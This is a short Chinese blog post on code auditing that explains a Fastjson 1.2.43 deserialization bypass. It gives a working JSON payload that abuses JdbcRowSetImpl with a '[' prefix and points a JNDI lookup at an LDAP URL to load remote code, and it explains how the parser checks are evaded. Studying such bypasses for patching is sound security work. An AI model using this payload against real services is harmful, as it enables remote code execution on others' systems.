Java代码审计——Fastjson1.2.43反序列化漏洞
2022/3/1 12:22:14
本文主要是介绍Java代码审计——Fastjson1.2.43反序列化漏洞,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
0x00 前言
反序列化总纲
1.2.24可参考:1.2.24fastjson
1.2.25-1.2.41 可参考:1.2.25
1.2.25-1.2.42 可参考:1.2.42
这篇就单纯划水~
0x01 正文
在1.2.43中,修复了LL,但是又有新的东西可以利用,因为在loadclass中还会去处理"[“那么我们现在就可以通过”["进行绕过,先上payload再进行说明
String payload="{\"@type\":\"[com.sun.rowset.JdbcRowSetImpl\"[{,\"dataSourceName\":\"ldap://localhost:9999/a\",\"autoCommit\":true" ;
首先是[com.sun.rowset.JdbcRowSetImpl,通过这个方式可以过checkAutotype检测。
其次是[{,"dataSourceName,这里的[{主要目的是通过fastjson的自动检测,实际上就是对token进行控制,这里如果是[的话就会让token变为14从而通过之后的检测
这篇关于Java代码审计——Fastjson1.2.43反序列化漏洞的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-06-19《2023版Java工程师》课程升级公告
- 2024-06-15matplotlib作图不显示3D图,怎么办?
- 2024-06-1503-Loki 日志监控
- 2024-06-1504-让LLM理解知识 -Prompt
- 2024-06-05做软件测试需要懂代码吗?
- 2024-06-0514-ShardingSphere的分布式主键实现
- 2024-06-03为什么以及如何要进行架构设计权衡?
- 2024-05-31全网首发第二弹!软考2024年5月《软件设计师》真题+解析+答案!(11-20题)
- 2024-05-31全网首发!软考2024年5月《软件设计师》真题+解析+答案!(21-30题)
- 2024-05-30【Java】百万数据excel导出功能如何实现